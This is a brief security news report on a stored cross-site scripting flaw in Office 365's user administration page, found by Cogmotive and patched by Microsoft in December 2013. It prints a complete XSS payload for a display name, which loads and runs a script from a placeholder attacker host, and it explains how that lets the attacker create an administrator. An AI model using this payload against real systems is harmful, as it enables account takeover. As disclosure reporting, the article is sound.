Cogmotive firm has discovered a potentially critical persistent cross site scripting(XSS) vulnerability in the Office 365 - a cloud version of office. A successful exploitation allows attacker to take control of the administrator account.
To exploit this vulnerability, you have to be one of the user. A malicious employee can change their own Display name to XSS vectors.
For instance, an attacker can modify his display name to the following script:
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"///><img id="b1" src=1 onerror='$.getScript("https://[attacker_website]/exploit/b.js", function() { c(); });'>'User administration page usually display the list of users in the portal. So, if an user changes his name, it will be reflected in that page.
When an admin user log into the portal and access the "User administration" page, the payload will get executed. It will load the malicious javascript file hosted in attacker's server and execute.
An attacker can exploit this vulnerability to create administrator within the company’s Office 365 environment.
"It is worth noting that this weakness seems to have been introduced recently within the new Wave 15 version of Office 365." Alan Byrne, Co-founder of Cogmotive said in company's blog.
Alan immediately reported the bug to Microsoft on October 2013. On December 2013, Microsoft patched the vulnerability.
